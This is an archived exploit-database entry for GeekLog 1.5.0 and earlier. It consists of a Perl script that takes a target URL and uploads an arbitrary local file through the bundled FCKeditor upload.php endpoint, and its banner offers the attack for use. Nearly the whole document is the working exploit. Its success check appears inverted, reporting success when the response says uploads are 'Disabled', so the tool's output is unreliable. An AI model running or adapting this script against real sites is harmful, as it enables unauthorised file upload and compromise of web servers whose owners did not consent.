GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit

2008-08-25T00:00:00
ID EDB-ID:6306
Type exploitdb
Reporter t0pP8uZz
Modified 2008-08-25T00:00:00

Description

GeekLog <= 1.5.0 Remote Arbitrary File Upload Exploit. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

print &lt;&lt;INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+   GeekLog &lt;= 1.5.0 Remote Arbitrary File Upload   +
+                                                   +
+         Discovered && Coded By: t0pP8uZz          +
+                                                   +
+ 0day?!?Most sites need custom configuration files +
+ for this exploit to actually work, anyway enjoy   +
+                                                   +
+   Discovered On: 20 August 2008 / milw0rm.com     +
+                                                   +
+      Script Download: http://www.geeklog.net      +
+++++++++++++++++++++++++++++++++++++++++++++++++++++

INTRO

print "Enter URL(ie: http://site.com): ";
    chomp(my $url=&lt;STDIN&gt;);
    
print "Enter File Path(path to local file to upload): ";
    chomp(my $file=&lt;STDIN&gt;);

my $ua = LWP::UserAgent-&gt;new;
my $re = $ua-&gt;request(POST $url.'/fckeditor/editor/filemanager/upload/php/upload.php',
                      Content_Type =&gt; 'form-data',
                      Content      =&gt; [ NewFile =&gt; $file ] );

if($re-&gt;is_success) {
    if( index($re-&gt;content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
    else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }

exit;

# milw0rm.com [2008-08-25]